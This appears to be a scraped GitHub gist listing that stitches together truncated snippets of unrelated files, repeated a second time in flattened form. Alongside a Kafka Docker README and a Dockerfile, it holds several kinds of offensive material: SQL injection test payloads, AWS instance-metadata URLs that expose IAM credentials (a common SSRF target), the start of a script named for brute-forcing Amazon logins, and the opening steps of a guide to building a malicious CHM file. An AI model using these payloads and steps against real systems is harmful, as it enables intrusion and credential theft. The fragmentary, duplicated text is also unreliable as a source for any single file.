Shrumplestiltskin

## payloads.txt
# The situation is the following:
# Your enter ab in a feature and it return data to you but when your enter ab' it indicate that there is not data found.
#
# So, does it means that there is no SQLi because ab' is well handled OR the error is catched
# and a "not data found message" is returned?
#
# The goal here is to submit a payload that, if interpreted by the SQL DB, will give ab and then data will be returned
# then indicating that there is a SQLi because the payload is interpreted.
ab';#
ab';--

## href-urls.sh
#!/bin/bash
echo "<title>Generated hyper Link URLS</title>" >> $1-urls.html
cat $1 | while read urls; do
        echo "<a href=${urls}>${urls}</a></br></br>" >> $1-urls.html
done

## foxyproxy.json
{
  "mode": "patterns",
  "proxySettings": [
    {
      "address": "127.0.0.1",
      "port": 8080,
      "username": "",
      "password": "",
      "type": 1,
      "title": "127.0.0.1:8080",

## awsEmailCheck.py
import re
import sys
import subprocess
from time import sleep  # Can be optimized / replaced
from selenium import webdriver
from selenium.webdriver.chrome.options import Options

def bruteAmazonEmailLogin(userEmail):
	options = Options()
	options.add_argument("--headless")

## content_discovery_nullenc0de.txt
/
$$$lang-translate.service.js.aspx
$367-Million-Merger-Blocked.html
$defaultnav
${idfwbonavigation}.xml
$_news.php
$search2
£º
.0
/0

## content_discovery_all.txt
`
~/
~
×™×


___
__
_

## cloud_metadata.txt
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories

http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

## README.md

      
              2 files
            
          
              10 forks
            
          
              1 comment
            
          
              17 stars
            
          
                dkurzaj
                / README.md
            
            
              Last active
              April 3, 2023 06:54
            
              
                Docker compose Kafka, Zookeeper and Kafka manager
              
          
    Docker compose Kafka, Zookeeper and Kafka manager

Gist inspired by this one intending to be an updated version of it : https://gist.github.com/17twenty/d619f922ab209f750630824f7c6836e3
Install


Create the environment variable that contains our host name (IP address) :

$ export EXPOSED_HOSTNAME=$(ip addr | grep 'state UP' -A2 | tail -n1 | awk '{print $2}' | cut -f1  -d'/')


Create the folders :


## Malicious-CHM-Guide.md

      
              1 file
            
          
              10 forks
            
          
              5 comments
            
          
              35 stars
            
          
                mgeeky
                / Malicious-CHM-Guide.md
            
            
              Created
              February 6, 2018 13:52
            
              
                CheatSheet describing how to create malicious CHM file by hand (another approach is to use Nishang's Out-Chm scriptlet).
              
          
    Procedure for generating Malicious CHM file


Step 0: Download and install Microsoft HTML Help Workshop and Documentation
Step 1: Obtain a valid CHM file and unpack it using 7-zip
Step 2: Find an entry-point HTML file within "docs" directory and insert the following code into it's <body> section:

<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>


## Dockerfile
FROM golang:1.9

WORKDIR /go/src/github.com/purplebooth/example
COPY . .
RUN go build -ldflags "-linkmode external -extldflags -static" -a main.go

FROM scratch
COPY --from=0 /go/src/github.com/purplebooth/example/main /main
CMD ["/main"]
	# The situation is the following:
	# Your enter ab in a feature and it return data to you but when your enter ab' it indicate that there is not data found.
	#
	# So, does it means that there is no SQLi because ab' is well handled OR the error is catched
	# and a "not data found message" is returned?
	#
	# The goal here is to submit a payload that, if interpreted by the SQL DB, will give ab and then data will be returned
	# then indicating that there is a SQLi because the payload is interpreted.
	ab';#
	ab';--
	#!/bin/bash
	echo "<title>Generated hyper Link URLS</title>" >> $1-urls.html
	cat $1 \| while read urls; do
	echo "<a href=${urls}>${urls}</a></br></br>" >> $1-urls.html
	done
	{
	"mode": "patterns",
	"proxySettings": [
	{
	"address": "127.0.0.1",
	"port": 8080,
	"username": "",
	"password": "",
	"type": 1,
	"title": "127.0.0.1:8080",
	import re
	import sys
	import subprocess
	from time import sleep # Can be optimized / replaced
	from selenium import webdriver
	from selenium.webdriver.chrome.options import Options

	def bruteAmazonEmailLogin(userEmail):
	options = Options()
	options.add_argument("--headless")
	/
	$$$lang-translate.service.js.aspx
	$367-Million-Merger-Blocked.html
	$defaultnav
	${idfwbonavigation}.xml
	$_news.php
	$search2
	£º
	.0
	/0
	## AWS
	# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories

	http://169.254.169.254/latest/user-data
	http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
	http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
	http://169.254.169.254/latest/meta-data/ami-id
	http://169.254.169.254/latest/meta-data/reservation-id
	http://169.254.169.254/latest/meta-data/hostname
	http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
	FROM golang:1.9

	WORKDIR /go/src/github.com/purplebooth/example
	COPY . .
	RUN go build -ldflags "-linkmode external -extldflags -static" -a main.go

	FROM scratch
	COPY --from=0 /go/src/github.com/purplebooth/example/main /main
	CMD ["/main"]